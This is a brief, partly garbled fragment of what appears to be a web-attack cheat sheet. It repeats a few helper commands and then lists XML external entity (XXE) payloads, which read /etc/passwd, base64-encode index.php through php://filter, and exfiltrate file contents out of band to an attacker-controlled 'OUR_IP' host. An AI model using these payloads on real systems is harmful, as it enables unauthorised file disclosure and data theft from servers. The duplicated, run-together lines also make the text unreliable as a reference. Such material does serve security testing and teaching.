Web Attacks To The Point
curl -X OPTIONS <url>echo -n 'string' | md5sum
echo -n 'string' | base64Last updated
curl -X OPTIONS <url>echo -n 'string' | md5sum
echo -n 'string' | base64Last updated
<!ENTITY xxe SYSTEM "http://localhost/email.dtd">
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">